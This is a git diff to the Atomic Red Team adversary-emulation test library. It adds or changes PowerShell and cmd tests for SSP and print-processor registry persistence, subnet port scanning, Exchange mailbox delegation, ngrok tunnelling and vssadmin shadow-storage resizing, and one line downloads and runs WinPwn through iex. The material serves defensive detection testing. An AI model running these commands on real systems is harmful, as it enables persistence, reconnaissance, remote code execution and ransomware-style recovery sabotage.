+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+ name: powershell
+ elevation_required: true
+ - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
+ Provider configuration in registry
+ auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
description: Add a value to a Windows registry SSP key, simulating an adversarial
modification of those keys.
supported_platforms:
- windows
- input_arguments:
- fake_ssp_dll:
- description: Value added to registry key. Normally refers to a DLL name
- in C:\Windows\System32.
- type: string
- default: not-a-ssp
executor:
command: |
- # run these in sequence
- $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
- $SecurityPackagesUpdated = $SecurityPackages
- $SecurityPackagesUpdated += "#{fake_ssp_dll}"
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
- # revert (before reboot)
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
name: powershell
elevation_required: true
T1181:
@@ -49150,7 +49220,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -49190,7 +49260,43 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- atomic_tests: []
+ identifier: T1547.012
+ atomic_tests:
+ - name: Print Processors
+ auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+ description: |
+ Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+ The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+ Note: The test assumes a x64 Windows operating system.
+
+ The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+ supported_platforms:
+ - windows
+ input_arguments:
+ restart:
+ description: set to 1 if you want the computer to reboot as part of the
+ test
+ type: integer
+ default: 0
+ executor:
+ command: |
+ if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+ net stop spooler
+ Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+ reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+ net start spooler
+ if(#{restart}){
+ Restart-Computer
+ }
+ cleanup_command: |
+ net stop spooler
+ rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+ rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+ remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+ net start spooler
+ name: powershell
+ elevation_required: true
T1574.001:
technique:
modified: '2023-03-30T21:01:51.098Z'
@@ -51401,28 +51507,43 @@ persistence:
- Administrator
identifier: T1547.005
atomic_tests:
- - name: Modify SSP configuration in registry
+ - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
+ configuration in registry
auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+ description: |
+ Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+ A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+ name: powershell
+ elevation_required: true
+ - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
+ Provider configuration in registry
+ auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
description: Add a value to a Windows registry SSP key, simulating an adversarial
modification of those keys.
supported_platforms:
- windows
- input_arguments:
- fake_ssp_dll:
- description: Value added to registry key. Normally refers to a DLL name
- in C:\Windows\System32.
- type: string
- default: not-a-ssp
executor:
command: |
- # run these in sequence
- $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
- $SecurityPackagesUpdated = $SecurityPackages
- $SecurityPackagesUpdated += "#{fake_ssp_dll}"
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
- # revert (before reboot)
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
name: powershell
elevation_required: true
T1004:
@@ -61297,7 +61418,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -61318,6 +61439,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
@@ -64138,7 +64260,7 @@ command-and-control:
Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok
executor:
command: "C:\\Users\\Public\\ngrok\\ngrok.exe config add-authtoken #{api_token}
- | Out-Null\nStart-ThreadJob -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe
+ | Out-Null\nStart-Job -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe
tcp #{port_num} } | Out-Null\nStart-Sleep -s 5 \nStop-Job -Name Job1 | Out-Null\n"
cleanup_command: |
Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore
@@ -67099,7 +67221,7 @@ collection:
dir
- name: Compress Data and lock with password for Exfiltration with 7zip
auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
- description: 'Note: Requires 7zip installation
+ description: 'Note: This test requires 7zip installation
'
supported_platforms:
@@ -87713,6 +87835,57 @@ discovery:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
name: powershell
+ - name: Port-Scanning /24 Subnet with PowerShell
+ auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4
+ description: |
+ Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
+ The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
+ supported_platforms:
+ - windows
+ input_arguments:
+ ip_address:
+ description: IP-Address within the target subnet. Default is empty and script
+ tries to determine local IP address of attacking machine.
+ type: string
+ default: ''
+ port_list:
+ description: Comma separated list of ports to scan
+ type: string
+ default: 445, 3389
+ timeout_ms:
+ description: Connection timeout in milliseconds
+ type: string
+ default: '200'
+ executor:
+ command: |
+ $ipAddr = "#{ip_address}"
+ if ($ipAddr -eq "") {
+ # Assumes the "primary" interface is shown at the top
+ $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+ Write-Host "[i] Using Interface $interface"
+ $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+ }
+ Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+ $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+ # Always assumes /24 subnet
+ Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+ $ports = #{port_list}
+ $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+ foreach ($ip in $subnetIPs) {
+ foreach ($port in $ports) {
+ try {
+ $tcp = New-Object Net.Sockets.TcpClient
+ $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+ } catch {}
+ if ($tcp.Connected) {
+ $tcp.Close()
+ Write-Host "Port $port is open on $ip"
+ }
+ }
+ }
+ name: powershell
T1518:
technique:
modified: '2023-03-30T21:01:50.920Z'
@@ -95389,6 +95562,18 @@ impact:
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
name: command_prompt
elevation_required: true
+ - name: Windows - vssadmin Resize Shadowstorage Volume
+ auto_generated_guid: da558b07-69ae-41b9-b9d4-4d98154a7049
+ description: Adversaries generally try to Resize Shadowstorage Volume using
+ vssadmin.exe to avoid the shadow volumes being made again. This technique
+ is typically found used by adversaries during a ransomware event and a precursor
+ to deleting the shadowstorage.
+ supported_platforms:
+ - windows
+ executor:
+ command: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%'
+ name: powershell
+ elevation_required: true
T1561.001:
technique:
modified: '2023-04-12T23:42:59.868Z'
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 8bf704b9..aa2dfafb 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -26,6 +26,8 @@ Within macOS environments, adversaries may use the native Bonjour application to
- [Atomic Test #9 - Network Service Discovery for Containers](#atomic-test-9---network-service-discovery-for-containers)
+- [Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell](#atomic-test-10---port-scanning-24-subnet-with-powershell)
+
@@ -400,4 +402,66 @@ sudo systemctl start docker
+
+
+
+## Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell
+Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
+The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 05df2a79-dba6-4088-a804-9ca0802ca8e4
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ip_address | IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. | string | |
+| port_list | Comma separated list of ports to scan | string | 445, 3389|
+| timeout_ms | Connection timeout in milliseconds | string | 200|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$ipAddr = "#{ip_address}"
+if ($ipAddr -eq "") {
+ # Assumes the "primary" interface is shown at the top
+ $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+ Write-Host "[i] Using Interface $interface"
+ $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+}
+Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+# Always assumes /24 subnet
+Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+$ports = #{port_list}
+$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+foreach ($ip in $subnetIPs) {
+ foreach ($port in $ports) {
+ try {
+ $tcp = New-Object Net.Sockets.TcpClient
+ $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+ } catch {}
+ if ($tcp.Connected) {
+ $tcp.Close()
+ Write-Host "Port $port is open on $ip"
+ }
+ }
+}
+```
+
+
+
+
+
+
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml
index 6a4fe601..8677e3dc 100644
--- a/atomics/T1046/T1046.yaml
+++ b/atomics/T1046/T1046.yaml
@@ -194,3 +194,53 @@ atomic_tests:
docker stop t1046_container
docker rmi -f t1046
name: sh
+- name: Port-Scanning /24 Subnet with PowerShell
+ auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4
+ description: |
+ Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
+ The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
+ supported_platforms:
+ - windows
+ input_arguments:
+ ip_address:
+ description: IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine.
+ type: string
+ default: ""
+ port_list:
+ description: Comma separated list of ports to scan
+ type: string
+ default: "445, 3389"
+ timeout_ms:
+ description: Connection timeout in milliseconds
+ type: string
+ default: "200"
+ executor:
+ command: |
+ $ipAddr = "#{ip_address}"
+ if ($ipAddr -eq "") {
+ # Assumes the "primary" interface is shown at the top
+ $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+ Write-Host "[i] Using Interface $interface"
+ $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+ }
+ Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+ $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+ # Always assumes /24 subnet
+ Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+ $ports = #{port_list}
+ $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+ foreach ($ip in $subnetIPs) {
+ foreach ($port in $ports) {
+ try {
+ $tcp = New-Object Net.Sockets.TcpClient
+ $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+ } catch {}
+ if ($tcp.Connected) {
+ $tcp.Close()
+ Write-Host "Port $port is open on $ip"
+ }
+ }
+ }
+ name: powershell
diff --git a/atomics/T1098.002/T1098.002.md b/atomics/T1098.002/T1098.002.md
new file mode 100644
index 00000000..edc71006
--- /dev/null
+++ b/atomics/T1098.002/T1098.002.md
@@ -0,0 +1,80 @@
+# T1098.002 - Account Manipulation: Additional Email Delegate Permissions
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/002)
+Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.
+
+For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe)
+
+Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
+
+This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
+
+## Atomic Tests
+
+- [Atomic Test #1 - EXO - Full access mailbox permission granted to a user](#atomic-test-1---exo---full-access-mailbox-permission-granted-to-a-user)
+
+
+
+
+## Atomic Test #1 - EXO - Full access mailbox permission granted to a user
+Give a nominated user, full mailbox delegation access of another user.
+This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
+
+**Supported Platforms:** Office-365
+
+
+**auto_generated_guid:** 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | office-365 username | string | o365_user_test@contoso.com|
+| password | office-365 password | string | o365_password_test|
+| delegate_target | office-365 target_email | string | delegate@contoso.com|
+| operator_mailbox | office-365 target_email | string | operator@contoso.com|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Import-Module ExchangeOnlineManagement
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
+Disconnect-ExchangeOnline -Confirm:$false
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module ExchangeOnlineManagement
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
+Disconnect-ExchangeOnline -Confirm:$false
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: ExchangeOnlineManagement PowerShell module must be installed
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name ExchangeOnlineManagement
+```
+
+
+
+
+
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 6d3d465a..48ef9ce6 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -122,6 +122,8 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #56 - Snake Malware Registry Blob](#atomic-test-56---snake-malware-registry-blob)
+- [Atomic Test #57 - Allow Simultaneous Download Registry](#atomic-test-57---allow-simultaneous-download-registry)
+
@@ -2072,4 +2074,38 @@ $typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemPropert
+
+
+
+## Atomic Test #57 - Allow Simultaneous Download Registry
+A registry modification to allow Simultaneous download in the system.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 37950714-e923-4f92-8c7c-51e4b6fffbf6
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
+reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
+```
+
+
+
+
+
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index a893c4ec..7ac331e7 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -871,4 +871,19 @@ atomic_tests:
cleanup_command: |
$typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemProperty -Path $typicalPath -Name "AtomicSnake" -ErrorAction SilentlyContinue | Out-Null
name: powershell
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
+- name: Allow Simultaneous Download Registry
+ auto_generated_guid: 37950714-e923-4f92-8c7c-51e4b6fffbf6
+ description: |
+ A registry modification to allow Simultaneous download in the system.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
+ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
+ cleanup_command: |
+ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
+ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
+ name: command_prompt
+ elevation_required: true
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 9c7b805b..67015d38 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -36,6 +36,8 @@ Adversaries may also delete “online” backups that are connected to their net
- [Atomic Test #9 - Disable System Restore Through Registry](#atomic-test-9---disable-system-restore-through-registry)
+- [Atomic Test #10 - Windows - vssadmin Resize Shadowstorage Volume](#atomic-test-10---windows---vssadmin-resize-shadowstorage-volume)
+
@@ -333,4 +335,32 @@ reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v
+
+
+
+## Atomic Test #10 - Windows - vssadmin Resize Shadowstorage Volume
+Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** da558b07-69ae-41b9-b9d4-4d98154a7049
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%
+```
+
+
+
+
+
+
diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index 5a1a86b2..92e45a3a 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -136,6 +136,7 @@ atomic_tests:
name: command_prompt
elevation_required: true
- name: Windows - vssadmin Resize Shadowstorage Volume
+ auto_generated_guid: da558b07-69ae-41b9-b9d4-4d98154a7049
description:
Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
supported_platforms:
diff --git a/atomics/T1547.005/T1547.005.md b/atomics/T1547.005/T1547.005.md
index 79a4b3c0..256a9a06 100644
--- a/atomics/T1547.005/T1547.005.md
+++ b/atomics/T1547.005/T1547.005.md
@@ -6,13 +6,16 @@ The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentC
## Atomic Tests
-- [Atomic Test #1 - Modify SSP configuration in registry](#atomic-test-1---modify-ssp-configuration-in-registry)
+- [Atomic Test #1 - Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry](#atomic-test-1---modify-hklmsystemcurrentcontrolsetcontrollsa-security-support-provider-configuration-in-registry)
+
+- [Atomic Test #2 - Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry](#atomic-test-2---modify-hklmsystemcurrentcontrolsetcontrollsaosconfig-security-support-provider-configuration-in-registry)
-## Atomic Test #1 - Modify SSP configuration in registry
-Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
+## Atomic Test #1 - Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry
+Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
**Supported Platforms:** Windows
@@ -23,29 +26,63 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | string | not-a-ssp|
-
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
-# run these in sequence
-$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
-$SecurityPackagesUpdated = $SecurityPackages
-$SecurityPackagesUpdated += "#{fake_ssp_dll}"
-Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
+$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+$newvalue = "AtomicTest.dll";
+Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+```
-# revert (before reboot)
-Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+#### Cleanup Commands:
+```powershell
+$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
```
+
+
+
+## Atomic Test #2 - Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry
+Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** de3f8e74-3351-4fdb-a442-265dbf231738
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+$newvalue = "AtomicTest.dll";
